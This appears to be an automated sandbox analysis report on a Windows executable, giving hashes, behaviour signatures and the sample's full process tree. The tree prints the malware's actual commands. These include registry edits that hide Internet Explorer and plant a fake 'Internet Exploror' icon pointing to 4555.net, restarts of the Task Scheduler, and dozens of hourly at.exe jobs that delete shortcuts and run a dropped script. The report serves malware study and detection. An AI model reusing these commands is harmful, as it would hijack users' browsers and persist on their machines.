Analysis
-
max time kernel
135s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
-
submitted
31-10-2024 08:20
General
-
Target
826ce26115a65a51cc3919ebb27bd7a2_JaffaCakes118.exe
-
Size
100KB
-
MD5
826ce26115a65a51cc3919ebb27bd7a2
-
SHA1
af7bef47c29b93748c79e72cb48c9aea5b0fffb6
-
SHA256
ea1ad2ca0aa5fec282b115c32372b5ad893d3702dcf12b505be35e0e84a4de96
-
SHA512
aa553eb4b4bef24e22cb08ec0e69649ad6a7411d887c00405005b697fefdccaccfeca03aa3f8f0931f089ac331be2273c0c979e80956543cd61be19eb6b93933
-
SSDEEP
1536:5e4t7WXCBJrs6h65lUwzFrANEyczrUy9/G6aqK1U3zwGJdy0zCEU:E4tWMJJh6fryYP/daqA8zfix
Malware Config
Signatures
-
Drops file in Program Files directory 8 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Service Discovery 1 TTPs 2 IoCs
Adversaries may try to gather information about registered local system services.
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Modifies registry class 44 IoCs
-
Runs net.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\826ce26115a65a51cc3919ebb27bd7a2_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\826ce26115a65a51cc3919ebb27bd7a2_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\huacai.vbs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C start /min iexplore http://4555.net/index2.html?huacai3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://4555.net/index2.html?huacai4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2772 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\to.cmd3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"4⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f4⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"4⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.4555.net/?ha" /f4⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"4⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"4⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.4555.net/?ha" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f4⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f4⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\copy.cmd3⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\run.cmd3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config Schedule start= auto4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\net.exenet start "Task Scheduler"4⤵
- System Location Discovery: System Language Discovery
- System Service Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start "Task Scheduler"5⤵
- System Location Discovery: System Language Discovery
- System Service Discovery
-
-
-
C:\Windows\SysWOW64\at.exeat 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Σ»└└*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd4⤵
-
-
C:\Windows\SysWOW64\at.exeat 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Σ»└└*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*└└*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd4⤵
-
-
C:\Windows\SysWOW64\at.exeat 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*└└*.*"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd4⤵
-
-
C:\Windows\SysWOW64\at.exeat 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 9:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 14:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\at.exeat 18:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"4⤵
-
-
